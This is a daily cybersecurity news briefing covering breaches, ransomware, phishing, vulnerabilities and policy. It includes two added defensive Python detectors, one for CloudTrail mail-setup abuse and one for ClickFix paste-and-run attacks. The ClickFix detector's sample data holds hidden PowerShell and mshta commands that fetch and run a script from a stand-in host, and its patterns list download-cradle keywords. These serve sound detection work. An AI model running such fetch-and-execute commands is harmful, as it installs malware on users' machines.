TODAY'S TOP 5

CISA SAYS EYE STILL ON RUSSIA: The Department of Homeland Security said that its Cybersecurity and Infrastructure Security Agency will continue to pay attention to Russian cyber threats, contrary to media reports suggesting the opposite, CyberScoop reports. The Guardian reported last week that a recent CISA memo setting out priorities for the agency did not list Russia among them, while including Chinese threats and critical infrastructure protection. It further reported that analysts at the agency were verbally told not to follow or report on Russian cyber threats. “The memo referenced in the Guardian’s ‘reporting’ is not from the Trump Administration, which is quite inconvenient to the Guardian’s preferred narrative,” said Tricia McLaughlin, DHS spokesperson. “CISA remains committed to addressing all cyber threats to U.S. critical infrastructure, including from Russia. There has been no change in our posture or priority on this front.”

  • Four key cyber staff at the National Security Council are now in place, and several have been strong advocates for offensive cyber operations, a likely preview of where President Donald Trump’s cyber policy is heading following major Chinese breaches of U.S. networks, POLITICO reports. At the top of the cyber chain of command stands Alexei Bulazel, senior director for cyber at the National Security Council. Bulazel comes from a private-sector cybersecurity background and previously served as a director for cyber policy on the National Security Council under Trump, according to his LinkedIn page. He has been vocal on the need for offensive cyber operations and critical of the U.S.’s current defensive posture.

IRAN BOTNET TARGETS TELECOMS: A massive botnet of more than 30,000 hacked security cameras and network video recorders is being used to launch DDoS attacks against telecom providers and gaming platforms, according to security researchers from Nokia Deepfield and GreyNoise. The botnet, tracked as Eleven11bot, also launches brute-force attacks against login systems and exploits weak and default passwords on IoT devices, according to GreyNoise. More than 60% of the 1,042 observed IP addresses have been traced to Iran, Cybersecurity Dive reports. GreyNoise does not formally make attributions, but it noted that the attacks came days after the Trump administration imposed new sanctions on Iran, extending its “maximum pressure” campaign.

DISA Emerging Technologies Directorate Chief Engineer Deepak Seth speaks at the Defense IT Summit in Arlington, Va., on Feb. 27, 2024. (DISA)

HYBRID AI AND HUMAN RED TEAMS: The new U.S. presidential administration has an opportunity to combine human expertise with AI-powered analysis to identify the potential vulnerabilities of draft tech policies before they are implemented, rather than after adversaries have weaponized them, according to a Stimson policy memo. The widespread belief among policymakers that geopolitical considerations alone are sufficient when developing technology policies and export controls overlooks three crucial vulnerabilities that pose substantial risks to U.S. national security, the memo argues.

  • Artificial intelligence implementation for national security requires agility, data integrity and strategic adaptation, defense officials said Thursday at the Defense IT Summit in Arlington, Virginia, GovCIO reports. “There are constant innovations out there. How can we take what’s there, apply it really quick and see that we’re getting value?” said Deepak Seth, chief engineer of the Emerging Technologies Directorate at the Defense Information Systems Agency (DISA). “If it’s not valuable, [we need to] stop and pivot over to the next thing.” Agility in collaboration with industry and other government organizations can provide Defense Department offices and units with more innovative AI solutions in national security, Seth added.

CHINA’S QUEST TO AUTOMATE BATTLE: The drones that fanned out during a recent People’s Liberation Army exercise were dispatched by the Intelligent Precision Strike System, a new product from Chinese defense giant Norinco that used the UAVs’ real-time data to model the battlefield, track targets, devise strike plans, distribute firing information, and execute follow-up strikes. According to the video playing in Norinco’s booth at the most recent Zhuhai Air Show, almost all of this was done autonomously except giving the commands to fire, Defense One reports. Chinese observers also noted how the system fused battlefield intelligence from multiple sources. It epitomizes how the PLA aims to ensure dominance in the next era of conflict: with autonomous capabilities that blur the line between human oversight and machine execution.

STATES WEIGH DATA CENTER DEMANDS: Legislators in states where the U.S. data center boom is about to kick into higher gear are considering bills that could force developers to pony up to connect their power-hungry loads to the grid, E&E News reports. Bills in Georgia, California and Virginia, for example, could place more costs of data center infrastructure on developers rather than being borne by ratepayers, addressing a concern that the new loads could raise utility costs. Others would establish new rules regarding how data centers can obtain power. Even lawmakers in Texas — a market long known for its hands-off rules — are considering a bill that would raise costs for data centers and potentially force them to power off during a grid emergency.

CYBER FOCUS PODCAST

In the latest episode of Cyber Focus, host Frank Cilluffo sits down with SentinelOne Vice President for Government Affairs Andrew Howell and McCrary Institute Deputy Director for Policy and Partnerships Kyle Klein. Together, they discuss the evolving cybersecurity legislative landscape in the early days of the 119th Congress. The conversation covers key bills such as the Cyber PIVOTT Act, updates to the Computer Fraud and Abuse Act, efforts to designate space as critical infrastructure, AI regulation, and cybersecurity funding for state and local governments. They also examine the future direction of the Cybersecurity and Infrastructure Security Agency (CISA) and the broader challenges of supply chain security.

SUBSCRIBE TO CYBER FOCUS: YouTube | Spotify | Apple Podcasts

CYBER AND CI UPDATES

ATTACKS AND INCIDENTS

Breaches

Cyberattack launched at Missouri Department of Conservation

A 2022 MDC audit conducted by former Missouri State Auditor Nicole Galloway pointed out multiple cybersecurity shortfalls within the department, including the lack of a fully established department-wide security plan and the absence of any comprehensive risk assessment. Other issues included not removing the linked accounts of terminated users, not requiring employees to update their passwords, and not documenting security incident response, reporting, and correction activities. (KSDK.COM)

Indian stockbroker Angel One discloses data breach

The incident, the company said, was discovered after it received an email alert from a ‘dark web monitoring partner’ on February 27, regarding a ‘data leakage post’. “After analyzing the post, it was ascertained that some of Angel One’s AWS resources were compromised,” the company said. Angel One says it immediately changed the passwords for its AWS cloud and related applications, and that it retained external experts to investigate the incident, assess the scope of the data breach, and identify its root cause. (SECURITYWEEK.COM)

Rubrik rotates authentication keys after log server breach

Rubrik disclosed last month that one of its servers hosting log files was breached, causing the company to rotate potentially leaked authentication keys. The company has confirmed to BleepingComputer that the breach was not a ransomware incident and that it did not receive any communication from the threat actor. Rubrik is a cybersecurity company that specializes in data protection, backup, and recovery, and has over 3,000 employees in more than 22 global offices. The company has over 6,000 customers worldwide, including high-profile companies like AMD, Adobe, PepsiCo, Home Depot, Allstate, Sephora, GSK, Honda, Harvard University, and Trellix. (BLEEPINGCOMPUTER.COM)

Critical infrastructure

Several local governments struggling with cyberattacks limiting services

Government services offered by one of the largest counties in Maryland are still being limited more than a week after it was targeted by a cyberattack. Anne Arundel County, home to nearly 600,000 people and the state capital of Annapolis, first announced the incident on February 23 and as of Monday is warning residents that multiple services are still down. 911 and 311 call centers are operational, but County Executive Steuart Pittman said many other services are impacted by the shutoff of internet access, an action taken to “ensure the safety” of government systems. County officials initially said the attack was “of external origin” and was considered a “multi-day event.” (THERECORD.MEDIA)

Healthcare

Cancer hospital breach is claimed by Qilin gang in new ransomware low

The Qilin ransomware group said it is responsible for the February 10 hack of a prestigious cancer treatment center in Japan, exposing the sensitive health information of 300,000 patients and leaving its hospital system “unusable.” The Utsunomiya Central Clinic (UCC) cancer treatment center first alerted the public to the ransomware attack on its website on February 18, roughly a week after announcing it was experiencing technical difficulties with its network systems. Located in Utsunomiya city on Japan’s main Honshu island, the clinic stated that once it discovered the breach, it took measures “to disconnect the server from the internet and the hospital's network,” forcing the clinic to limit its medical care services. (CYBERNEWS.COM)

Palau health ministry on the mend after Qilin ransomware attack

The health ministry of the Pacific island nation of Palau has recovered from a ransomware attack launched by a gang known for targeting prominent healthcare institutions. Palau officials told Recorded Future News that the February 17 ransomware attack launched by hackers connected to a group named Qilin allowed the infiltrators to steal files from IT systems used by the Ministry of Health and Human Services (MHHS). (THERECORD.MEDIA)

Malware

Attackers leverage Microsoft Teams and Quick Assist for access

A sophisticated cyberattack combining social engineering with widely used remote access tools has been uncovered by security researchers at Trend Micro. The attack, which involves a stealthy infostealer, grants cybercriminals persistent control over compromised machines and enables them to steal sensitive data. According to Trend Micro Threat Intelligence, most incidents since October 2024 have been concentrated in North America, with 21 breaches recorded. The US was the most affected, with 17 incidents, followed by Canada and the UK, each experiencing five. Europe recorded 18 incidents in total. (INFOSECURITY-MAGAZINE.COM)

Ransomware

Black Basta leader escapes from courtroom in Armenia while awaiting judge's decision

Alleged Black Basta ransomware boss Oleg Nefedov, wanted by Interpol and U.S. authorities, was detained in Armenia for 72 hours. When the judge failed to issue a temporary detention decision in time, the suspect walked out of the courtroom and disappeared. He later bragged about “very high-level” friends. Intel 471, a cyber threat intelligence company, connected more dots tying the persona of the Black Basta gang leader known as GG (tramp, usernamegg) to Oleg Nefedov. Black Basta’s internal messages were recently leaked, revealing many intricacies of the ransomware gang's operations. (CYBERNEWS.COM)

Trends

Latin American orgs face 40% more attacks than global average

Cyber threats are accelerating faster in Latin America than anywhere else in the world, and the trend has been building for at least a year. Last summer, Check Point tracked a 53% year-over-year rise in weekly cyberattacks against organizations in the region, followed at a distance by Africa (37%) and Europe (35%). Today, the cybersecurity company reports, Latin American companies suffer 2,569 attacks per week on average, nearly 40% more than the global average of 1,848. (DARKREADING.COM)


THREATS

Phishing

Hackers exploit AWS misconfigurations to launch phishing attacks via SES and WorkMail

Threat actors are targeting Amazon Web Services (AWS) environments to push out phishing campaigns to unsuspecting targets, according to findings from Palo Alto Networks Unit 42. The cybersecurity company is tracking the activity cluster under the name TGR-UNK-0011 (short for a threat group with unknown motivation), which it said overlaps with a group known as JavaGhost. TGR-UNK-0011 has been active since 2019. "The group focused historically on defacing websites," security researcher Margaret Kelley said. "In 2022, they pivoted to sending out phishing emails for financial gain." (THEHACKERNEWS.COM)
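An intruder who has obtained working AWS credentials has to set up outbound mail before a phishing run, and that setup lands in CloudTrail. The triage below is an added example, not code from Unit 42 or from the original article: it surfaces any principal outside an approved sender list that makes mail-setup calls, and weighs them higher when the same key also creates IAM persistence. The SES and WorkMail event names are an assumed watch-list of control-plane calls needed to send mail from an account (the page does not say which calls the campaign makes), and the sample trail (account 111122223333, the access key IDs, the 203.0.113.45 source address) is constructed.

```python
"""Triage CloudTrail for an uninvited principal setting up outbound mail (SES or
WorkMail) in an account, the trace a stolen long-term access key leaves before
a phishing run. Added example; SAMPLE_TRAIL below is constructed."""
import json
from collections import defaultdict

# Assumed watch-list of control-plane calls needed to send mail from an account.
# Which calls a real campaign makes is not stated on this page; tune to your own
# CloudTrail baseline.
MAIL_SETUP_CALLS = {
    ("ses.amazonaws.com", "GetSendQuota"),
    ("ses.amazonaws.com", "GetAccount"),
    ("ses.amazonaws.com", "VerifyEmailIdentity"),
    ("ses.amazonaws.com", "CreateEmailIdentity"),
    ("workmail.amazonaws.com", "CreateOrganization"),
    ("workmail.amazonaws.com", "CreateUser"),
    ("workmail.amazonaws.com", "RegisterToWorkMail"),
}
# IAM calls that give the intruder a second foothold once the first key is burned.
PERSISTENCE_CALLS = {
    ("iam.amazonaws.com", "CreateUser"),
    ("iam.amazonaws.com", "CreateAccessKey"),
    ("iam.amazonaws.com", "AttachUserPolicy"),
}


def triage_cloudtrail(records, known_mailers=frozenset()):
    """Group watch-listed calls by access key (ARN for keyless identities) and
    return a finding for every principal outside known_mailers that either makes
    two or more mail-setup calls or pairs one of them with IAM persistence."""
    buckets = defaultdict(lambda: {"arn": "", "mail": [], "persist": [], "ips": set(), "denied": 0})
    for rec in records:
        ident = rec.get("userIdentity", {})
        principal = ident.get("accessKeyId") or ident.get("arn", "unknown")
        call = (rec.get("eventSource"), rec.get("eventName"))
        if call in MAIL_SETUP_CALLS:
            buckets[principal]["mail"].append(call[1])
        elif call in PERSISTENCE_CALLS:
            buckets[principal]["persist"].append(call[1])
        else:
            continue
        b = buckets[principal]
        b["arn"] = ident.get("arn", "")
        b["ips"].add(rec.get("sourceIPAddress", ""))
        # A denied call still shows the key probing for mail permissions.
        if rec.get("errorCode"):
            b["denied"] += 1

    findings = []
    for principal, b in buckets.items():
        if principal in known_mailers:
            continue
        if len(b["mail"]) >= 2 or (b["persist"] and b["mail"]):
            findings.append({
                "principal": principal,
                "arn": b["arn"],
                "mail_calls": b["mail"],
                "persistence": b["persist"],
                "source_ips": sorted(b["ips"]),
                "denied": b["denied"],
                # AKIA = long-term user key; ASIA = temporary STS credential.
                "long_term_key": principal.startswith("AKIA"),
            })
    return findings


# Constructed CloudTrail extract: a legitimate CI key checks its quota, a leaked
# backup-service key creates a user and tries to stand up SES and WorkMail, and
# an assumed role does unrelated EC2 work.
_LEAKED = {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/backup-svc",
           "accessKeyId": "AKIAEXAMPLELEAKED001"}
SAMPLE_TRAIL = {"Records": [
    {"eventTime": "2025-03-03T09:12:04Z", "eventSource": "ses.amazonaws.com", "eventName": "GetSendQuota",
     "sourceIPAddress": "10.20.30.40",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ci-deploy",
                      "accessKeyId": "AKIAEXAMPLECIDEPLOY0"}},
    {"eventTime": "2025-03-03T11:40:51Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateUser",
     "sourceIPAddress": "203.0.113.45", "requestParameters": {"userName": "support"}, "userIdentity": _LEAKED},
    {"eventTime": "2025-03-03T11:41:13Z", "eventSource": "ses.amazonaws.com", "eventName": "GetSendQuota",
     "sourceIPAddress": "203.0.113.45", "userIdentity": _LEAKED},
    {"eventTime": "2025-03-03T11:41:40Z", "eventSource": "ses.amazonaws.com", "eventName": "VerifyEmailIdentity",
     "sourceIPAddress": "203.0.113.45", "requestParameters": {"emailAddress": "billing@example.net"},
     "userIdentity": _LEAKED},
    {"eventTime": "2025-03-03T11:45:02Z", "eventSource": "workmail.amazonaws.com", "eventName": "CreateOrganization",
     "sourceIPAddress": "203.0.113.45", "errorCode": "AccessDenied", "userIdentity": _LEAKED},
    {"eventTime": "2025-03-03T12:00:00Z", "eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances",
     "sourceIPAddress": "10.20.30.41",
     "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::111122223333:assumed-role/ops/alice",
                      "accessKeyId": "ASIAEXAMPLETEMP00001"}},
]}

if __name__ == "__main__":
    for f in triage_cloudtrail(SAMPLE_TRAIL["Records"], known_mailers={"AKIAEXAMPLECIDEPLOY0"}):
        print(json.dumps(f, indent=2))
```

The finding for the backup-service key is what a responder wants to see in one place: a long-term key, a source address outside the account's usual ranges, an IAM user created moments before the SES calls, and a denied WorkMail attempt that would be invisible to any rule that only counts successful API calls.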

New ClickFix attack deploys Havoc C2 via Microsoft SharePoint

A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access to compromised devices. ClickFix is a social-engineering tactic that emerged last year, in which threat actors create websites or phishing attachments that display fake errors and then prompt the user to click a button to fix them. Clicking the button copies a malicious PowerShell command into the Windows clipboard, and the user is then told to paste it into a command prompt to "fix" the error. Instead, the pasted command fetches and executes a script hosted on a remote site, which downloads and installs malware on the device. (BLEEPINGCOMPUTER.COM)
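The mechanism described above leaves a distinctive process-creation trace: the interpreter is spawned by the user's own shell (the Run box or a console), not by a service or an Office application, and its command line packs a download cradle, hidden window and in-memory execution into one line. The detector below is an added example, not code from the original article or from the researchers it cites. It assumes Sysmon Event ID 1 records forwarded as JSON lines with Image, ParentImage, CommandLine and User fields; the sample records, including the fake-error-page.invalid hostname, are constructed.

```python
"""Flag paste-and-run (ClickFix-style) executions in Sysmon process-creation
events: an interpreter launched from the user's shell (Run box or console)
whose command line combines two or more of a download cradle, hidden window,
in-memory execution and a remote URL. Added example; SAMPLE_EVENTS is constructed."""
import json
import re
from pathlib import PureWindowsPath

# Command-line traits of a pasted one-liner. Each is common on its own in
# legitimate administration; two or more from a desktop parent are not.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|curl|wget|mshta)\b"),
    "exec_hint": re.compile(r"(?i)(\biex\b|invoke-expression|-enc(odedcommand)?\b|frombase64string)"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "remote_url": re.compile(r"(?i)https?://"),
}
# Parents that mean a human typed or pasted the command (Win+R, cmd, Terminal).
PASTE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
# Interpreters ClickFix lures ask the victim to feed.
PASTED_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe"}


def classify(event):
    """Return the indicator names that fired, or [] when the event is not a
    user-launched interpreter with at least two indicators on its command line."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    if image not in PASTED_IMAGES or parent not in PASTE_PARENTS:
        return []
    cmdline = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return hits if len(hits) >= 2 else []


def triage_process_events(jsonl):
    """Scan JSON-lines Sysmon Event ID 1 records (the field names a log
    forwarder emits are assumed) and return one alert per matching event."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        hits = classify(ev)
        if hits:
            alerts.append({
                "user": ev.get("User", "?"),
                "image": PureWindowsPath(ev["Image"]).name.lower(),
                "cmd": ev.get("CommandLine", ""),
                "hits": hits,
            })
    return alerts


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed records: a scheduled script, an admin opening a console, and
# two ClickFix victims who pasted what the fake error page gave them.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "User": "CORP\\alice", "Image": PS,
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"},
    {"EventID": 1, "User": "CORP\\alice", "Image": PS,
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"" + PS + "\" -NoProfile"},
    {"EventID": 1, "User": "CORP\\bob", "Image": PS,
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (irm https://fake-error-page.invalid/fix.ps1)\""},
    {"EventID": 1, "User": "CORP\\carol", "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta https://fake-error-page.invalid/verify.hta"},
])

if __name__ == "__main__":
    for a in triage_process_events(SAMPLE_EVENTS):
        print(a["user"], a["image"], a["hits"], "::", a["cmd"])
```

The rule is deliberately scoped to user-launched interpreters, which is what separates a pasted lure from the same cradle arriving via a scheduled task or a macro; pair it with a separate rule for those parents rather than loosening this one. Requiring two indicators keeps an administrator who opens a console with -NoProfile out of the alert queue while still catching the mshta variant, which carries no PowerShell keywords at all.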

Vulnerabilities

Android security update contains 2 actively exploited vulnerabilities

The most severe of the flaws under active exploitation, CVE-2024-43093, carries a CVSS score of 7.8 and was added to the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities catalog in November. The Android framework flaw allows local privilege escalation without additional execution privileges, but requires user interaction for exploitation. (CYBERSCOOP.COM)

Hackers exploit Paragon Partition Manager driver vulnerability in ransomware attacks

Threat actors have been exploiting a security vulnerability in Paragon Partition Manager's BioNTdrv.sys driver in ransomware attacks to escalate privileges and execute arbitrary code. The zero-day flaw (CVE-2025-0289) is one of a set of five vulnerabilities discovered by Microsoft, according to the CERT Coordination Center (CERT/CC). "These include arbitrary kernel memory mapping and write vulnerabilities, a null pointer dereference, insecure kernel resource access, and an arbitrary memory move vulnerability," CERT/CC said. Because the driver carries a valid Microsoft signature, attackers can drop it on a machine that never installed Paragon software, a bring-your-own-vulnerable-driver (BYOVD) technique. (THEHACKERNEWS.COM)


ADVERSARIES

North Korea

North Korean IT workers hide their IPs using Astrill VPN

Security researchers have uncovered new evidence that North Korean threat actors, particularly the Lazarus Group, are actively using Astrill VPN to conceal their true IP addresses during cyberattacks and fraudulent IT worker schemes. Silent Push, a cybersecurity firm, recently acquired infrastructure and logs from the Lazarus subgroup known as “Contagious Interview” or “Famous Chollima,” confirming the ongoing use of Astrill VPN in their operations. The investigation revealed that the threat actors registered the domain “bybit-assessment[.]com” hours before the $1.4 billion ByBit cryptocurrency heist, using an email address previously linked to Lazarus Group activities. (GBHACKERS.COM)

Kimsuky’s new campaign uses RDP Wrapper for remote access

The North Korean state-backed group Kimsuky uses a custom-built RDP Wrapper in its latest campaign, paired with proxy tools to gain direct access to infected networks. Researchers say the activity shows a shift in the group's infection tactics: it now favors specialized remote access tools over noisier backdoors such as PebbleDash, although the latter remain in use. The current infection chain begins with a spear-phishing email carrying a malicious shortcut file disguised as a PDF or Word document. (IZOOLOGIC.COM)


GOVERNMENT AND INDUSTRY

Artificial intelligence

AI versus the brain and the race for general intelligence

There's no question that AI systems have accomplished some impressive feats, mastering games, writing text, and generating convincing images and video. That's gotten some people talking about the possibility that we're on the cusp of AGI, or artificial general intelligence. While some of this is marketing fanfare, enough people in the field are taking the idea seriously that it warrants a closer look. Many arguments come down to the question of how AGI is defined, which people in the field can't seem to agree upon. This contributes to estimates of its advent that range from "it's practically here" to "we'll never achieve it." Given that range, it's impossible to provide any sort of informed perspective on how close we are. (ARSTECHNICA.COM)

How can we take AI to the edge of possibility?

In a lab in Singapore, an artificial intelligence (AI) algorithm accelerates cancer detection, helping doctors pinpoint malignant cells with unprecedented speed and accuracy. On a farm in Kenya, AI-powered sensors analyse soil conditions in real time, guiding farmers towards precision irrigation that boosts crop yields while conserving water. Meanwhile, in the Arctic, machine learning models process satellite imagery to track ice sheet changes, giving scientists an early warning system for rising sea levels. These breakthroughs highlight a truth often overlooked: AI’s transformative power extends far beyond chatbots and virtual assistants – it holds the key to solving some of the world’s most pressing challenges. Yet, our collective focus remains narrow, fixated on generative AI’s immediate conveniences rather than its deeper potential to reshape entire industries and societies. (WEFORUM.ORG)

Researchers surprised to find less-educated areas adopting AI writing tools faster

Since the launch of ChatGPT in late 2022, experts have debated how widely AI language models would impact the world. A few years later, the picture is getting clearer. According to new Stanford University-led research examining over 300 million text samples across multiple sectors, AI language models now assist in writing up to a quarter of professional communications. The impact is large, especially in less-educated parts of the United States. (ARSTECHNICA.COM)

Energy

New England, New York grid operators prepare to collect millions in tariffs on Canadian electricity

The tariff on Canadian energy resources is part of a broader set of duties on imports President Trump announced in January and subsequently paused for 30 days. The two countries “have one of the most integrated international electric grids in the world,” New York ISO told FERC. The tariffs could add millions of dollars to customer bills. The grid operators say they don’t believe they have a role in collecting or remitting the duties. “However, given the uncertainty surrounding these issues, the ISO deemed it necessary to make this filing,” ISO New England said. (UTILITYDIVE.COM)

ALSO: Ontario will cut off U.S. electricity exports 'with a smile on my face,' premier says (TORONTOSUN.COM)

After Moss Landing, what’s next for battery storage?

Energy storage experts note that the Moss Landing facility was housed indoors and used a type of battery more prone to thermal runaway, among other potential safety issues. Utility-scale lithium-ion battery installations’ overall safety track record is impressive, with just 20 fire-related incidents over the past decade despite a 25,000% increase in installed capacity since 2018, a spokesperson for the American Clean Power Association told Utility Dive last month. But the Moss Landing incident has nevertheless focused the attention of utilities, regulators and lawmakers on lithium-ion battery safety. It could also create an opening for non-lithium energy storage technologies to compete, some experts say. (UTILITYDIVE.COM)

Leadership

Katie Arrington named acting Pentagon CIO

Mere weeks after being named the chief information security officer for the Defense Department, Katie Arrington was announced Monday as the Pentagon’s official “Performing the Duties of the Department of Defense Chief Information Officer.” The DOD Office of the CIO announced the move by Secretary of Defense Pete Hegseth to place Arrington as the acting CIO in a post on LinkedIn. The post also confirmed that Leslie Beavers, who had been acting CIO since John Sherman left the role last June, will return to her primary role as principal deputy CIO. (DEFENSESCOOP.COM)

Social media

ICO launches TikTok investigation over use of children’s data

The UK’s privacy regulator has launched an investigation into TikTok, Reddit and Imgur after expressing concerns over the way the sites use children’s personal information. The Information Commissioner’s Office (ICO) revealed the news this morning, claiming that “recommender systems” on the sites could lead to vulnerable youngsters being served inappropriate or harmful content. In the case of Imgur and Reddit, the regulator is looking at how the platforms use children’s personal information and their use of age assurance measures, which estimate or verify a child’s age so that age-appropriate content can be served to them. (INFOSECURITY-MAGAZINE.COM)

Space

NOAA terminates space, climate and marine life advisory committees

The Trump administration is disbanding expert advisory committees focused on space, climate, coastal area management and marine fisheries after the agency they were designed to assist said they are no longer necessary. The National Oceanic and Atmospheric Administration is ending the committees because they “have served their purpose and should be terminated,” Nancy Hann, the agency’s deputy undersecretary for operations, said in a memorandum obtained by Government Executive. The terminations follow an executive order from President Trump requiring agencies to do away with any federal advisory committees not required by law. (NEXTGOV.COM)

Transportation

AI is telling New York subway workers if that suspicious sound is a problem

The Metropolitan Transportation Authority, responsible for managing public transit across New York City, launched a pilot program last Thursday that uses a prototype developed by Google Public Sector to detect potential track issues with sensors and artificial intelligence. Called TrackInspect, the program attaches Google Pixel consumer smartphones, using their built-in sensors and external microphones, to subway cars to capture vibrations and sound patterns, such as suspicious rattles, bangs or squeals, as trains move through the subway system. (STATESCOOP.COM)

LEGISLATIVE UPDATES

HEARINGS

AIR SAFETY: The House Committee on Transportation and Infrastructure will hold a hearing March 4 on the country’s air traffic control system infrastructure and staffing.

ONLINE EXTREMISM: The House Homeland Security Subcommittee on Counterterrorism and Intelligence will hold a March 4 hearing on how terrorists use the internet and online networks for recruitment and radicalization.

CHINA’S TYPHOONS: The House Select Committee on the Chinese Communist Party will hold a hearing March 5 on how to deter Beijing’s cyber actions and enhance America’s cyber defenses.

CHINA THREATS: The House Homeland Security Committee will hold a March 5 hearing on countering threats posed by the Chinese Communist Party to U.S. security.

EVENTS

QUANTUM: Former Director of the National Security Agency (NSA) and Commander of U.S. Cyber Command Adm. Michael Rogers, USN (Ret.), will discuss how the United States can position itself as a global leader in quantum technologies at a March 4 CSIS event.

SPACE SECURITY: Chatham House’s 2025 Space Security Conference, online and in person on March 5, convenes policymakers and leaders from the private sector, multilateral organizations, academia and NGOs for a day of high-level interactive discussions examining conflict, competition and cooperation in outer space.

AI ENERGY: The CSIS Energy Security and Climate Change Program will host a March 5 conversation with Vivian Lee, Managing Director and Partner at Boston Consulting Group (BCG), and Shanu Mathew, Portfolio Manager and Research Analyst at Lazard Asset Management. Vivian and Shanu will discuss the state of AI electricity demand, the implications of DeepSeek, the trend towards colocation, prospects for nuclear, and other key dynamics at the intersection of AI and electricity.

AI@AU: Four artificial intelligence experts from industry and academia will offer deeper insight into the emerging technology and its best practices through a lecture series, presented by Auburn University’s AI@AU initiative. The “Spring 2025 AI@AU Forum” will be March 7, March 14, April 11 and April 25 (all Fridays at 10 a.m.) in Lowder Hall, Room 127, or can be viewed live via Zoom. Recorded lectures will also be available.

CYBER SUMMIT: The Billington State and Local CyberSecurity Summit will be held March 10-12 at the Ronald Reagan Building in Washington, D.C. On Monday, March 10, Billington CyberSecurity will partner with StateRAMP in hosting the 2025 StateRAMP Symposium on Cybersecurity Framework Harmonization. The State and Local CyberSecurity Summit’s programming and exhibit hall conversations take place on Tuesday, March 11, and Wednesday, March 12.

NUCLEAR: Registration for the Nuclear Regulatory Commission’s 37th annual Regulatory Information Conference is open. The RIC will be held March 11-13 in North Bethesda, Maryland, and online.

CYBER CHALLENGE: The Atlantic Council’s Cyber Statecraft Initiative, in partnership with American University’s School of International Service and Washington College of Law, will hold the fourteenth annual Cyber 9/12 Strategy Challenge in Washington, DC on March 14-15. The event will be held in a hybrid format: teams may attend virtually via Zoom or in person at American University’s Washington College of Law, and the agenda and format will look very similar to past Cyber 9/12 Challenges. Plenary sessions will be livestreamed via Zoom.

AI FAILS: By some estimates, more than 80 percent of AI projects fail. That’s twice the rate of failure for IT projects that don't involve AI. RAND's James Ryseff talked to experienced data scientists and machine learning engineers to uncover five root causes that lead to AI failures, and what can be done to minimize these issues. He’ll discuss the findings in a March 26 webinar.

DEFENSE TECH: On March 27 the Atlantic Council’s Forward Defense Program will publicly launch the final report of the Commission on Software-Defined Warfare. The report presents a software-defined warfare approach, offering recommendations for the DoD to adopt modern software practices and seamlessly integrate them into existing platforms to enhance and strengthen defense strategies. Speakers will include former Defense Secretary Mark Esper and former Under Secretary of Defense for Acquisition and Sustainment Ellen Lord.

FOLLOW THE McCRARY INSTITUTE ON LINKEDIN | X | FACEBOOK

SUBSCRIBE TO THE CYBER FOCUS PODCAST: YOUTUBE | SPOTIFY | APPLE PODCASTS

GET THE DAILY CYBER BRIEFING IN YOUR INBOX: SUBSCRIBE
